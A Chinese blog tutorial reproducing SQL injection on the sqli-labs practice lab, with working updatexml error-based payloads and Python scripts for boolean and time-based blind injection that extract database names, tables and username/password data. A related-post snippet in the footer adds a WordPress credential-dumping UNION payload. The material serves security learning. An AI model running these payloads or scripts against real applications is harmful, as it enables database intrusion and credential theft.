sql注入-常见注入方法复现

已于 2024-08-06 01:33:19 修改
阅读量878 收藏 8
点赞数 24
分类专栏: 网络安全 文章标签: sql 数据库 web安全 安全 运维
于 2024-08-06 01:32:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64620936/article/details/140939314
版权

环境演示均已sql-labs为例

1、报错注入

1.1常用的报错注入的函数

掌握好extractvalue、updatexml、floor报错,floor报错较难需要多理解,updatexml较为常用

定义

报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。是一种页面响应形式。

响应过程:

用户在前台页面输入检索内容\rightarrow后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行\rightarrow数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面

报错注入存在基础:后台对于输入输出的合理性没有做检查

演示

输入正常语句情况下页面

当对sql语句闭合后:

可以发现我们语句正确后,他并不会回显我们数据,但是报错时会回显,那么我们可以利用一些报错函数进行注入

以下以最常见的updataxml为例

语法

UPDATEXML(XML_document, XPath_string,new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称
第二个参数:XPath_string (Xpath格式的字符串),Xpath语法
第三个参数:new_value,string格式,替换查找到的符合条件的数据

我们只需要修改第二个参数即可

127.0.0.1/sqli-labs7/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

库名成功注入出来,接下来就是表名、列名、数据

表名:

http://127.0.0.1/sqli-labs7/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

列名:

http://127.0.0.1/sqli-labs7/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and%20table_name='users'),0x7e),1)--+

爆数据

由于updatexml()是32个字节,无法完全显示,那么我们就使用substr()进行截取,后期再进行拼接

http://127.0.0.1/sqli-labs7/Less-5/?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,'$',password) from users),32,64),0x7e),1)--+

2、盲注

盲注主要分为两种,一种为时间类型盲注,一种为布尔类型盲注

判断是否是布尔类型的:当一个界面存在注入,但是没有显示位,没有SQL语句执行错误信息,由于布尔类型的注入只会告知是或者不是,所以只能通过页面返回的对与错来进行一个SQL的注入。

2.1布尔盲注

根据页面回显判断是或不是,进行判断

当出现错误是就无回显,那么我们可以根据这个现象进行注入判断

利用二分法和ASCII码进行渗透:

使用substr()提取字符转换成ascii比大小进行判断是否为真,真则有回显‘you are in ...’,假则无

http://127.0.0.1/sqli-labs7/Less-8/?id=1' and%20ascii(substr((select database()),1,1))>114--+

根据此现象我们写一个python脚本快速进行注入

import time

import requests

url = 'http://127.0.0.1/sqli-labs7/Less-8/'

def inject_database(url):
    name = ''
    for i in range(1, 50):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(), %d, 1)) > %d-- " % (i, mid)
            res = {"id": payload}
            # start_time = time.time()
            r = requests.get(url, params=res)
            # end_time = time.time()
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

库出来了,那么接下来的流程就是爆表名,列名和数据了

只需对脚本的payload进行修改即可

表名:
payload = "1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()), %d, 1)) > %d-- " % (i, mid)

列名:
payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'), %d, 1)) > %d-- " % (i, mid)

数据:
payload = "1' and ascii(substr((select group_concat(username,'$',password) from users), %d, 1)) > %d-- " % (i, mid)

2.2时间盲注

来到第九关之后我们发现没有真假之分了,那么我们就可以使用时间盲注来解决

注入方法:

        我们只需要在布尔盲注的基础上加入一个if判断,为真时加载2秒,为假时则什么都不做,其他地方跟布尔盲注没有太大区别。

脚本如下:

import time

import requests

url = 'http://127.0.0.1/sqli-labs7/Less-9/'

def inject_database(url):
    name = ''
    for i in range(1, 50):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

表名、列名、数据依旧是修改payload即可,和第8关一样

气泡水。
关注
  • 24
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1374
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
metinfo 后台sql注入1
08-03
SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,欺骗服务器执行非预期的数据库操作,从而获取敏感信息或破坏数据库。在MetInfo 6.1.0版本中,问题出现在多个DB::get_one函数调用中,这些调用使用了...
SQL注入、XSS与CSRF漏洞的复现及分析
Kali与编程
04-14 419
总结起来,SQL注入、XSS和CSRF都是常见且危害严重的Web漏洞。理解这些漏洞的复现方法和原理有助于我们更好地制定针对性的安全策略,并通过实施有效的防御措施来保护Web应用不受此类攻击的侵害。攻击者可以在自己的网站上创建类似的表单,诱使用户在其不知情的情况下触发此表单提交,完成转账。当其他用户浏览包含此评论的页面时,会弹出警告框,表明存在XSS漏洞。SQL注入、XSS与CSRF漏洞的复现及分析。二、跨站脚本攻击(XSS)漏洞复现与分析。一、SQL注入漏洞复现与分析。
SQL注入的场景复现和解决方案
欢迎来到 ABin-阿斌的博客:写一生代码,创一世佳话,筑一览芳华。
03-12 1245
SQL注入SQL Injection)是一种常见的网络攻击技术,它利用应用程序没有正确过滤用户输入的数据,将恶意的 SQL 代码注入到应用程序中执行,从而导致应用程序的安全性受到威胁。通简单来说,就是通过构造恶意的 SQL 语句,将恶意代码注入到应用程序中执行,从而实现各种攻击手段。
SQL注入
m0_75178803的博客
03-02 355
sql数据库注入的一些知识点
常见SQL注入手法
weixin_57048716的博客
11-26 1674
1.联合查询 2.伪静态注入 3.宽字节注入 4.报错注入 5.基于布尔盲注 6.基于延时的盲注 7.堆叠注入 8.二次注入
狮子鱼SQL注入漏洞复现
花开烟雨楼的博客
03-23 1445
狮子鱼CMS是一款管理系统。在 ApiController.class.php处 参数过滤存在不严谨,导致SQL注入漏洞。
网络安全SQL注入漏洞复现(中篇)(技术进阶)
weixin_70911257的博客
04-21 1418
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
php168sql注入漏洞
08-15
- **原理**:SQL注入是一种常见Web安全漏洞,通过向应用程序的输入字段插入恶意SQL代码,从而改变原有的查询逻辑,实现对数据库的非法操作。在本案例中,攻击者通过在`keyword`参数中插入特定的SQL语句,绕过了...
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
PHPCMS2008广告模板SQL注入漏洞修复
10-21
SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令,从而获取、修改或删除数据库中的敏感信息。 【漏洞描述】 此漏洞出现在PHPCMS2008的广告模块中,具体地,是由于系统在处理广告...
sql注入方式及知识点总结(超详细)
qq_67473072的博客
07-22 3855
sql注入方式及知识点总结(超详细)
复现awvs——sql注入漏洞(报错注入加时间盲注)
记录并分享学习安全的知识点..
03-12 3335
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、sql注入介绍及分类 sql 注入就是一种通过操作输入来修改后台操作语句达到执行恶意 sql 语句来进行攻击的技术。 按变量类型分: • 数字型 • 字符型 按 HTTP 提交方式分 • GET 注入 • POST 注入 • Cookie 注入注入方式分 • 报错注入 • 盲注 • 布尔盲注 • 时间盲注 • union 注入 编码问题 • 宽字节注入 二、awvs扫描结果 .
[WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程
AAAAAAAAAAAA66的博客
12-23 1513
中华人民共和国网络安全法(出版物)_360百科 可以说一道经典的CTF题目,解这道题的过程类似于我们渗透测试的过程,所以把它放在了这个专栏,在这里我们详细讲过程,而不是原理。 目录 题目 寻找方向 flag .php YearsCMS 报错注入 后台读取flag 总结 题目 给了我们提示,而且注意题目名字,YeserCMS CMS(内容管理系统)提示我们要找到这个网站的CMS版本 进入环境 寻找方向 一般情况我们肯定都是把能点的全点一遍,上传的上传...
SQL注入常见方式
LainWith的博客
10-09 7250
目录联合查询(union)函数介绍order byunion select操作布尔盲注 (and or)函数介绍mid 从中间截取字符left 从左开始截取字符ord、ascii 转成ascii码length 统计长度andregexp 正则注入-针对MySQL操作1. 猜数据库长度2. 猜数据库名 (配合BurpSuite)3. 猜表的个数4. 猜表5. 猜列6. 猜值延时注入(sleep if)函数操作1. 猜数据库长度2. 猜数据库名3. 猜表名4. 猜测 users 表的列5. 猜值宽字节注入引子
SQL注入篇--基础注入
qq_51003021的博客
08-12 1506
sql注入的原理就是在服务器后端对数据库进行操作请求之前,人为地对sql语句做一些恶意注入,从而达到人为预期效果,造成数据泄露甚至数据破坏。注入漏洞在OWASP2021年的总结中位列TOP10的第一名,可见注入漏洞的危害之大,理论上注入漏洞可以帮助我们办到任何后端可以办到的事情。...
SQL注入总结
qq_44657899的博客
07-25 3252
布尔盲注 布尔型数字盲注 fuzz1 1 结果1 2 结果2 2-1 结果1 fuzz2 1 结果1 1^1 结果2 1^0 结果1 常用语句^(ascii(substr((select(value)from(flag)),1,1))>1) 脚本一(简单,效率低): import requests s=requests.session() flag = '' for i in range(1,50): for j in '{qwertyuiopasdfghjklzxcvbnm_@#
wordpress sql注入复现
最新发布
04-29
WordPress SQL注入漏洞是指攻击者通过构造恶意SQL语句,利用WordPress的SQL查询接口,成功地向WordPress数据库中插入或者篡改数据,甚至可以直接获取管理员权限。以下是一个简单的复现过程: 1. 在WordPress网站的搜索框中输入以下内容: ``` ' UNION SELECT null, user_login, user_pass FROM wp_users-- ``` 2. 点击搜索按钮,可以看到网站返回的SQL语句中已经将当前WordPress网站的用户名和密码列举出来了。 3. 攻击者可以利用这个漏洞,将恶意代码插入到WordPress数据库中,从而获取网站的控制权。 需要注意的是,为了复现这个漏洞,需要对WordPress进行一定的设置和环境搭建。在实际攻击中,攻击者可能会通过其他途径进行攻击。建议管理员及时更新WordPress版本并采取安全措施来防范此类漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值